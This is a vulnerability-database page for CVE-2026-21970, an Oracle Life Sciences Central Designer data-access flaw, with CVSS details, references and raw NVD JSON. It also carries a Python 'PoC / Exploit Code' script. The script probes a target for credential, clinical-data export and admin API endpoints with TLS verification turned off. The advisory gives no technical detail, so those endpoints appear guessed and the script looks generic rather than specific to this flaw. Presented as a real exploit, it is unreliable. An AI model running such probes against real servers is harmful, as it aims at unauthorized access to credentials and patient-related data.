CVE-2026-21970

Description

Vulnerability in the Oracle Life Sciences Central Designer product of Oracle Health Sciences Applications (component: Platform). The supported version that is affected is 7.0.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Life Sciences Central Designer. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Life Sciences Central Designer accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:life_sciences_central_designer:7.0.1.0:*:*:*:*:*:*:* - VULNERABLE

Oracle Life Sciences Central Designer 7.0.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-21970 PoC - Oracle Life Sciences Central Designer Unauthorized Data Access
# Target: Oracle Life Sciences Central Designer Platform Component

TARGET_HOST = "https://target-oracle-server.com"
CVE_ID = "CVE-2026-21970"

def exploit_unauthorized_access(target_host, session_cookie=None):
    """
    PoC for CVE-2026-21970: Platform component authorization bypass
    This demonstrates potential unauthorized data access through platform API
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/json'
    }
    
    if session_cookie:
        headers['Cookie'] = session_cookie
    
    # Target sensitive data endpoints that should require higher privileges
    sensitive_endpoints = [
        '/api/v1/designs/all',
        '/api/v1/users/credentials',
        '/api/v1/clinical-data/export',
        '/api/v1/platform/admin/access'
    ]
    
    results = []
    for endpoint in sensitive_endpoints:
        url = f"{target_host}{endpoint}"
        try:
            response = requests.get(url, headers=headers, timeout=10, verify=False)
            if response.status_code == 200 and len(response.content) > 0:
                results.append({
                    'endpoint': endpoint,
                    'status': 'VULNERABLE',
                    'data_length': len(response.content)
                })
        except requests.exceptions.RequestException as e:
            results.append({'endpoint': endpoint, 'status': 'ERROR', 'message': str(e)})
    
    return results

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
        print(f"[*] Testing {CVE_ID} on {target}")
        results = exploit_unauthorized_access(target)
        for r in results:
            print(r)
    else:
        print(f"Usage: python {sys.argv[0]} <target_url>")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21970
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21970
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21970/
[4] VulDB https://vuldb.com/cve/CVE-2026-21970
[5] https://www.oracle.com/security-alerts/cpujan2026.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21970", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:16:00.090", "lastModified": "2026-01-29T14:47:41.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Life Sciences Central Designer product of Oracle Health Sciences Applications (component: Platform). The supported version that is affected is 7.0.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Life Sciences Central Designer. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Life Sciences Central Designer accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)."}, {"lang": "es", "value": "Vulnerabilidad en el producto Oracle Life Sciences Central Designer de Oracle Health Sciences Applications (componente: Platform). La versión soportada que está afectada es 7.0.1.0. Vulnerabilidad fácilmente explotable permite a un atacante con pocos privilegios con acceso a la red vía HTTP comprometer Oracle Life Sciences Central Designer. Ataques exitosos de esta vulnerabilidad pueden resultar en acceso no autorizado a datos críticos o acceso completo a todos los datos accesibles de Oracle Life Sciences Central Designer. Puntuación Base CVSS 3.1 6.5 (Impactos en la Confidencialidad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:life_sciences_central_designer:7.0.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "FD42C36C-1BB2-4A80-B997-1F9C1861D7A0"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}